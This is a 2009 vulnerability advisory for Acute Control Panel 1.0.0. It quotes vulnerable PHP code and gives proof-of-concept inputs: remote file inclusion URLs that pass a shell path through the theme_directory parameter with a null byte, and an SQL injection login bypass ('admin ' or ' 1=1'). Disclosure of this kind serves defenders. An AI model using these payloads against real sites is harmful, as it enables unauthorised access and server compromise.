Acute Control Panel 1.0.0 (SQL/RFI) Multiple Remote Vulnerabilities

2009.04.08
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

############################################################### [+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass) [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org ############################################################### [+] Remote File Inclusion Vulnerable code in container.php ----------------------------------------------------------- <?php include_once($theme_directory."/sidebar.php"); ?> ----------------------------------------------------------- PoC : http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Vulnerable code in header.php -------------------------------------------------------------- <?php include_once($theme_directory."/navigation.php"); ?> -------------------------------------------------------------- PoC : http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] SQL Injection (Auth Bypass) Vulnerable code in login.php -------------------------------------------- $query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error()); -------------------------------------------- PoC : Username : admin ' or ' 1=1 Password : anything or nothing ################################################################

References:

http://xforce.iss.net/xforce/xfdb/49444
http://www.securityfocus.com/bid/34265
http://www.milw0rm.com/exploits/8291
http://secunia.com/advisories/34485


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top